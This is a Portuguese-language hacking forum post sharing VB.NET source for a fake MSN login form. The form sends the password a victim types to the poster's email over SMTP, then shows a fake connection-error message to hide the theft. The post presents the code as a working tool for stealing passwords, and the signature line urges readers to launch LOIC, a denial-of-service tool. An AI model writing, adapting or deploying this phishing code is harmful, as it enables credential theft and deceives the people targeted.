Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Msn fake funcionando!

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Msn fake funcionando!

    Boa noite galerinha do fórum! Eu criei um msn fake que pega a senha da vitima e envia para seu e-mail!
    Funciona mesmo!! Código:

    Imports System.Net.Mail

    Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    Dim Mail As New MailMessage
    Mail.Subject = "Login do manolo"
    Mail.To.Add("seu_email@hotmail.com")
    Mail.From = New MailAddress("qualquer_email@hotmail.com")
    Mail.Body = TextBox1.Text

    Dim SMTP As New SmtpClient("smtp.live.com")
    SMTP.EnableSsl = True
    SMTP.Credentials = New System.Net.NetworkCredential(ComboBox1.Text, TextBox1.Text)
    SMTP.Port = "587"
    SMTP.Send(Mail)
    MsgBox("Erro 7043. O computador não pode se conectar com o servidor. Tente mais tarde.", MsgBoxStyle.Critical)
    Me.Close()
    End Sub

    Private Sub ComboBox1_MouseClick(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles ComboBox1.MouseClick
    ComboBox1.Text = ""
    ComboBox1.ForeColor = Color.Black
    End Sub

    Private Sub ComboBox1_SelectedIndexChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ComboBox1.SelectedIndexChanged

    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
    Me.Close()
    End Sub
    End Class

    Link do projeto:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Scan: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    "A 3ª guerra mundial está declarada, abra seu LOIC e mande ver "
X
Working...
X